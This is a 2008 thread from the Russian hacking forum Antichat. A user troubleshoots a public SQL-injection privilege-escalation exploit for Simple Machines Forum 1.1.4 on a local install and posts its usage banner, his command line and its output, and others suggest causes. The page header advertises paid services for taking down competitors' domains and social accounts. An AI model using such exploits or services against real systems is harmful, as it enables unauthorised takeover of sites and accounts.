Форум АНТИЧАТ - Нужна помощь по испльзованию эксплойта

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Нужна помощь по испльзованию эксплойта

Опции темы

Поиск в этой теме

Опции просмотра

Нужна помощь по испльзованию эксплойта

26.10.2008, 07:24

Rashid

Познающий

Регистрация: 31.01.2008

Сообщений: 46

Провел на форуме:
124111

Репутация: 8

Нужна помощь по испльзованию эксплойта

Эксплойт: http://www.milw0rm.com/exploits/5826
Запускаю:
# python ./smf.py localhost /smf/ i3sdq9d8v1pe4fr20r6qjnqcs5 2

#================================================= ================#
# Simple Machines Forum <= 1.1.4 #
# Sql Injection Vulnerability #
# Priviledge Escalation Exploit #
# #
# ###################################### #
# # Let's get administrator rights!!! # #
# ###################################### #
# #
# Discovered By The:Paradox #
# #
# Usage: #
# ./Exploit [Target] [Path] [PHPSessID] [Userid] #
# #
# Example: #
# ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9 #
# ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36 #
#================================================= ================#

[.] Exploit Starts.
[+] Trying to read Sesc
[+] Sesc has been successfully read ==> 891439426d210d5c6e1d50cd68b54f0c
[+] Creating three labels...
[+] Sql code is going to be injected.
[+] All done.
Now user with ID_MEMBER 2 should have administrator rights.
-= Paradox Got This One =-

Насколько я правильно понимаю user with id=2 должен получить administrator rights, но этого не происходит.
Что я делаю не так???

26.10.2008, 11:34

swt1

Постоянный

Регистрация: 16.02.2008

Сообщений: 395

Провел на форуме:
3370466

Репутация: 96

перед использованием ты должен иметь права админа,потом юзай сплойт,включен ли register_globals on?)

Последний раз редактировалось swt1; 26.10.2008 в 11:56..

26.10.2008, 12:03

Rashid

Познающий

Регистрация: 31.01.2008

Сообщений: 46

Провел на форуме:
124111

Репутация: 8

register_globals включен

Цитата:

Сообщение от swt1

перед использованием ты должен иметь права админа

А смысл тогда какой в таком сплойте? Иметь права админа чтобы получить права админа?

26.10.2008, 12:27

swt1

Постоянный

Регистрация: 16.02.2008

Сообщений: 395

Провел на форуме:
3370466

Репутация: 96

Цитата:

Сообщение от Rashid

А смысл тогда какой в таком сплойте? Иметь права админа чтобы получить права админа?

верно не досмотрел)) тогда на сервере выключен регистр глобалс или стоит версия выше.

26.10.2008, 12:34

Rashid

Познающий

Регистрация: 31.01.2008

Сообщений: 46

Провел на форуме:
124111

Репутация: 8

Цитата:

Сообщение от swt1

верно не досмотрел)) тогда на сервере выключен регистр глобалс или стоит версия выше.

Я проверяю на localhost и весрия 1,1,4 и register_globals включен

26.10.2008, 16:15

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

Провел на форуме:
2080216

Репутация: 150

Отправить сообщение для Sleep с помощью ICQ

как ты его запускаеш???

26.10.2008, 16:33

Rashid

Познающий

Регистрация: 31.01.2008

Сообщений: 46

Провел на форуме:
124111

Репутация: 8

python ./smf.py localhost /smf/ i3sdq9d8v1pe4fr20r6qjnqcs5 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Нужна помощь !	ad1d0s	Сотовый фрикинг	0	03.09.2008 16:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход